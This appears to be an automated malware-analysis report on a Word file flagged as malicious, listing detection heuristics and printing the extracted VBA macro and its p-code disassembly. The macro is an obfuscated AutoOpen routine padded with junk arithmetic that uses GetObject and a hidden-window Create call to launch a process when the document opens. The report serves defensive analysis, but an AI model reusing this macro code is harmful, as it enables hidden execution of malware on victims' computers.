MALICIOUS
190
Risk Score
Heuristics 7
-
ClamAV: Doc.Malware.Drvb-6902289-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Drvb-6902289-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set TXABkB = GetObject(WZA_U1B.wAAXcA) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11466 bytes |
SHA-256: ee15022a278636ce438a6cc6779463dd9a9a7e53d7927ec5f678c4784f0b1b6a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "rXDoUA1D"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "WZA_U1B"
Attribute VB_Base = "0{75E9A92E-ECF1-4CCF-AF6C-5F39DBCAA415}{5478F83B-268A-4049-9EB6-E3BE4B2695D1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "wAAcAZ"
Sub autoopen()
On Error Resume Next
If jwQX_AQ = bQAAUAXQ Then
wBGXc1 = 70048900 - ChrB(470836093 * Round(414266693) + Q11Ux1 - ChrB(wxAAAAAA)) / w11QA1Bc / Rnd(32834712 / VXDQ_X_Q * SpBb / ChrW(666234281 * CBool(678345324) / 441023156 + CStr(skADAoCG))) / 243962631 * Oct(FcQUxAx)
End If
If E4UADQ = ak1QDxA Then
A4AAXUD = 181341305 - ChrB(2559126 * Round(651620675) + WUQAkw - ChrB(ABkA1oGQ)) / nAxkAUo / Rnd(663640487 / QDDk4A * SpBb / ChrW(86560935 * CBool(722992906) / 766325832 + CStr(qBUZ_Z))) / 639759154 * Oct(k1AAAA)
End If
Set TXABkB = GetObject(WZA_U1B.wAAXcA)
If lABABAXA = DAZABX Then
lQ1AAAAZ = 261543561 - ChrB(776236418 * Round(742841960) + SZAQQQU - ChrB(OBZAwQ4Q)) / hAo_4GA / Rnd(859834665 / ZUGABUA * SpBb / ChrW(613997888 * CBool(628780582) / 97799350 + CStr(pCZ_B1Z))) / 286060895 * Oct(VA_XZx1k)
End If
If wkAZQBXG = kQwcAx Then
FAUAAGXA = 692173888 - ChrB(882530444 * Round(261562846) + WwA_Uc - ChrB(WUAABA)) / KBcw_BZ / Rnd(194635374 / oAUA1UZ * SpBb / ChrW(913345409 * CBool(269177192) / 335333058 + CStr(SAADGAA))) / 409932476 * Oct(NAZA1XA4)
End If
If wAZA_o = z1CGAo Then
YwDBkDDo = 565046529 - ChrB(982937593 * Round(827222769) + vADX__ - ChrB(kwA4BUUc)) / P4AADGA / Rnd(908708001 / fAZAGkDA * SpBb / ChrW(569750413 * CBool(465100729) / 963190173 + CStr(tQc4A1))) / 379682012 * Oct(S4QA1A1U)
End If
TXABkB.ShowWindow = 709285 - 709285
If HkAQ1A = qQcc4Q Then
wAQA1X = 707896374 - ChrB(949739080 * Round(402376951) + uA1AACoA - ChrB(XZABUAck)) / Co1DDA / Rnd(621640367 / VwUGAQDQ * SpBb / ChrW(104621335 * CBool(720898872) / 57388389 + CStr(QUZAx_))) / 585106962 * Oct(rABAx_wA)
End If
If fQDAGCZ = q1BAAUC Then
cUXDAA_ = 883231790 - ChrB(228047737 * Round(55639862) + ckBA4Aoc - ChrB(vAAAX1)) / nAAC__AA / Rnd(973477493 / pA_DoAX1 * SpBb / ChrW(993290355 * CBool(177148998) / 637207538 + CStr(KAQDDQ))) / 736677806 * Oct(N1UABA)
End If
GetObject(WZA_U1B.nAAA_x).Create% EUxQU_A + WZA_U1B.PABZAxAD + AxAAkBAQ + WZA_U1B.V_AAkAZ + vAXAAA_A + WZA_U1B.dAZU_Ao + jQXBAQD, BA4UxAA, TXABkB, IAxA4AA
If ECAU4QA = JAwBDA Then
IX1o1DQA = 437120822 - ChrB(346753572 * Round(246870008) + OUAAGAo - ChrB(UZwAxAU)) / rDGAUA / Rnd(708072242 / JAAXDAoA * SpBb / ChrW(448745315 * CBool(68302440) / 232509212 + CStr(ZCUQQGBA))) / 796841784 * Oct(FA_AQxU4)
End If
If jBUABCZA = zA4UDw4 Then
DxAAD4 = 120193573 - ChrB(246416607 * Round(456916623) + R_A1oZCA - ChrB(uoDGAA_)) / Zo4A1oox / Rnd(350564299 / jxkDAQx * SpBb / ChrW(282469471 * CBool(826474509) / 879884602 + CStr(BCXAUAXU))) / 653008359 * Oct(hxAQ4Ax)
End If
If ix1GoDA = no1BADQ1 Then
PwQBoCA = 803746356 - ChrB(302626175 * Round(972335703) + SAAocZAQ - ChrB(oCAAAUx)) / nBAADk / Rnd(146735218 / l1AAGoZC * SpBb / ChrW(812377195 * CBool(386771033) / 99860431 + CStr(GBG_BGA))) / 318334200 * Oct(AoAAABGA)
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/f88ed73b9ed34013915ce465a9d5b993.bin
' ===============================================================================
' Module streams:
' Macros/VBA/rXDoUA1D - 1106 bytes
' Macros/VBA/WZA_U1B - 1158 bytes
' Macros/VBA/wAAcAZ - 5100 bytes
' Line #0:
' FuncDefn (Sub wAAcAZ())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld autoopen
' Ld jwQX_AQ
' Eq
' IfBlock
' Line #3:
' LitDI4 0xDC84 0x042C
' LitDI4 0x637D 0x1C10
' LitDI4 0x3545 0x18B1
' ArgsLd Round 0x0001
' Mul
' Ld wBGXc1
' Add
' Ld Q11Ux1
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld wxAAAAAA
' Div
' LitDI4 0x0498 0x01F5
' Ld w11QA1Bc
' Div
' Ld SpBb
' Mul
' LitDI4 0xEDA9 0x27B5
' LitDI4 0xBA6C 0x286E
' Coerce (Bool)
' Mul
' LitDI4 0x7AB4 0x1A49
' Div
' Ld VXDQ_X_Q
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x9307 0x0E8A
' Div
' Ld skADAoCG
' ArgsLd Oct 0x0001
' Mul
' Sub
' St bQAAUAXQ
' Line #4:
' EndIfBlock
' Line #5:
' Ld FcQUxAx
' Ld E4UADQ
' Eq
' IfBlock
' Line #6:
' LitDI4 0x0C79 0x0ACF
' LitDI4 0x0C96 0x0027
' LitDI4 0xF143 0x26D6
' ArgsLd Round 0x0001
' Mul
' Ld A4AAXUD
' Add
' Ld WUQAkw
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld ABkA1oGQ
' Div
' LitDI4 0x59A7 0x278E
' Ld nAxkAUo
' Div
' Ld SpBb
' Mul
' LitDI4 0xD0A7 0x0528
' LitDI4 0xFF0A 0x2B17
' Coerce (Bool)
' Mul
' LitDI4 0x3448 0x2DAD
' Div
' Ld QDDk4A
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0xF332 0x2621
' Div
' Ld qBUZ_Z
' ArgsLd Oct 0x0001
' Mul
' Sub
' St ak1QDxA
' Line #7:
' EndIfBlock
' Line #8:
' SetStmt
' Ld MSForms
' MemLd GetObject
' ArgsLd TXABkB 0x0001
' Set k1AAAA
' Line #9:
' Ld wAAXcA
' Ld lABABAXA
' Eq
' IfBlock
' Line #10:
' LitDI4 0xD689 0x0F96
' LitDI4 0x6D82 0x2E44
' LitDI4 0xDE68 0x2C46
' ArgsLd Round 0x0001
' Mul
' Ld lQ1AAAAZ
' Add
' Ld SZAQQQU
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld OBZAwQ4Q
' Div
' LitDI4 0x0929 0x3340
' Ld hAo_4GA
' Div
' Ld SpBb
' Mul
' LitDI4 0xDD40 0x2498
' LitDI4 0x6E26 0x257A
' Coerce (Bool)
' Mul
' LitDI4 0x4CB6 0x05D4
' Div
' Ld ZUGABUA
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0xF15F 0x110C
' Div
' Ld pCZ_B1Z
' ArgsLd Oct 0x0001
' Mul
' Sub
' St DAZABX
' Line #11:
' EndIfBlock
' Line #12:
' Ld VA_XZx1k
' Ld wkAZQBXG
' Eq
' IfBlock
' Line #13:
' LitDI4 0xBC40 0x2941
' LitDI4 0x588C 0x349A
' LitDI4 0x21DE 0x0F97
' ArgsLd Round 0x0001
' Mul
' Ld FAUAAGXA
' Add
' Ld WwA_Uc
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld WUAABA
' Div
' LitDI4 0xE66E 0x0B99
' Ld KBcw_BZ
' Div
' Ld SpBb
' Mul
' LitDI4 0x8B81 0x3670
' LitDI4 0x5168 0x100B
' Coerce (Bool)
' Mul
' LitDI4 0xC6C2 0x13FC
' Div
' Ld oAUA1UZ
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x12BC 0x186F
' Div
' Ld SAADGAA
' ArgsLd Oct 0x0001
' Mul
' Sub
' St kQwcAx
' Line #14:
' EndIfBlock
' Line #15:
' Ld NAZA1XA4
' Ld wAZA_o
' Eq
' IfBlock
' Line #16:
' LitDI4 0xED01 0x21AD
' LitDI4 0x6FF9 0x3A96
' LitDI4 0x6AF1 0x314E
' ArgsLd Round 0x0001
' Mul
' Ld YwDBkDDo
' Add
' Ld vADX__
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld kwA4BUUc
' Div
' LitDI4 0xC8A1 0x3629
' Ld P4AADGA
' Div
' Ld SpBb
' Mul
' LitDI4 0xB38D 0x21F5
' LitDI4 0xDFB9 0x1BB8
' Coerce (Bool)
' Mul
' LitDI4 0x1D9D 0x3969
' Div
' Ld fAZAGkDA
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x7CDC 0x16A1
' Div
' Ld tQc4A1
' ArgsLd Oct 0x0001
' Mul
' Sub
' St z1CGAo
' Line #17:
' EndIfBlock
' Line #18:
' LitDI4 0xD2A5 0x000A
' LitDI4 0xD2A5 0x000A
' Sub
' Ld k1AAAA
' MemSt S4QA1A1U
' Line #19:
' Ld ShowWindow
' Ld HkAQ1A
' Eq
' IfBlock
' Line #20:
' LitDI4 0xA436 0x2A31
' LitDI4 0xDE48 0x389B
' LitDI4 0xC8F7 0x17FB
' ArgsLd Round 0x0001
' Mul
' Ld wAQA1X
' Add
' Ld uA1AACoA
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld XZABUAck
' Div
' LitDI4 0x7AAF 0x250D
' Ld Co1DDA
' Div
' Ld SpBb
' Mul
' LitDI4 0x6517 0x063C
' LitDI4 0x0B38 0x2AF8
' Coerce (Bool)
' Mul
' LitDI4 0xAD65 0x036B
' Div
' Ld VwUGAQDQ
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x0612 0x22E0
' Div
' Ld QUZAx_
' ArgsLd Oct 0x0001
' Mul
' Sub
' St qQcc4Q
' Line #21:
' EndIfBlock
' Line #22:
' Ld rABAx_wA
' Ld fQDAGCZ
' Eq
' IfBlock
' Line #23:
' LitDI4 0x0C2E 0x34A5
' LitDI4 0xBB79 0x0D97
' LitDI4 0xFF36 0x0350
' ArgsLd Round 0x0001
' Mul
' Ld cUXDAA_
' Add
' Ld ckBA4Aoc
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld vAAAX1
' Div
' LitDI4 0x1675 0x3A06
' Ld nAAC__AA
' Div
' Ld SpBb
' Mul
' LitDI4 0x6873 0x3B34
' LitDI4 0x1446 0x0A8F
' Coerce (Bool)
' Mul
' LitDI4 0x03F2 0x25FB
' Div
' Ld pA_DoAX1
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0xCFAE 0x2BE8
' Div
' Ld KAQDDQ
' ArgsLd Oct 0x0001
' Mul
' Sub
' St q1BAAUC
' Line #24:
' EndIfBlock
' Line #25:
' Ld Create
' Ld MSForms
' MemLd EUxQU_A
' Add
' Ld PABZAxAD
' Add
' Ld MSForms
' MemLd AxAAkBAQ
' Add
' Ld V_AAkAZ
' Add
' Ld MSForms
' MemLd vAXAAA_A
' Add
' Ld dAZU_Ao
' Add
' Ld jQXBAQD
' Ld k1AAAA
' Ld BA4UxAA
' Ld MSForms
' MemLd N1UABA
' ArgsLd TXABkB 0x0001
' ArgsMemCall nAAA_x% 0x0004
' Line #26:
' Ld IAxA4AA
' Ld ECAU4QA
' Eq
' IfBlock
' Line #27:
' LitDI4 0xEF36 0x1A0D
' LitDI4 0x0A24 0x14AB
' LitDI4 0xEFF8 0x0EB6
' ArgsLd Round 0x0001
' Mul
' Ld IX1o1DQA
' Add
' Ld OUAAGAo
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld UZwAxAU
' Div
' LitDI4 0x5332 0x2A34
' Ld rDGAUA
' Div
' Ld SpBb
' Mul
' LitDI4 0x4F63 0x1ABF
' LitDI4 0x3668 0x0412
' Coerce (Bool)
' Mul
' LitDI4 0xCF1C 0x0DDB
' Div
' Ld JAAXDAoA
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0xD738 0x2F7E
' Div
' Ld ZCUQQGBA
' ArgsLd Oct 0x0001
' Mul
' Sub
' St JAwBDA
' Line #28:
' EndIfBlock
' Line #29:
' Ld FA_AQxU4
' Ld jBUABCZA
' Eq
' IfBlock
' Line #30:
' LitDI4 0x0225 0x072A
' LitDI4 0x04DF 0x0EB0
' LitDI4 0xFE8F 0x1B3B
' ArgsLd Round 0x0001
' Mul
' Ld DxAAD4
' Add
' Ld R_A1oZCA
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld uoDGAA_
' Div
' LitDI4 0x2FCB 0x14E5
' Ld Zo4A1oox
' Div
' Ld SpBb
' Mul
' LitDI4 0x245F 0x10D6
' LitDI4 0x000D 0x3143
' Coerce (Bool)
' Mul
' LitDI4 0xF93A 0x3471
' Div
' Ld jxkDAQx
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x1DE7 0x26EC
' Div
' Ld BCXAUAXU
' ArgsLd Oct 0x0001
' Mul
' Sub
' St zA4UDw4
' Line #31:
' EndIfBlock
' Line #32:
' Ld hxAQ4Ax
' Ld ix1GoDA
' Eq
' IfBlock
' Line #33:
' LitDI4 0x3234 0x2FE8
' LitDI4 0xB57F 0x1209
' LitDI4 0xAA57 0x39F4
' ArgsLd Round 0x0001
' Mul
' Ld PwQBoCA
' Add
' Ld SAAocZAQ
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld oCAAAUx
' Div
' LitDI4 0x0072 0x08BF
' Ld nBAADk
' Div
' Ld SpBb
' Mul
' LitDI4 0xE46B 0x306B
' LitDI4 0xA859 0x170D
' Coerce (Bool)
' Mul
' LitDI4 0xBFCF 0x05F3
' Div
' Ld l1AAGoZC
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x64F8 0x12F9
' Div
' Ld GBG_BGA
' ArgsLd Oct 0x0001
' Mul
' Sub
' St no1BADQ1
' Line #34:
' EndIfBlock
' Line #35:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.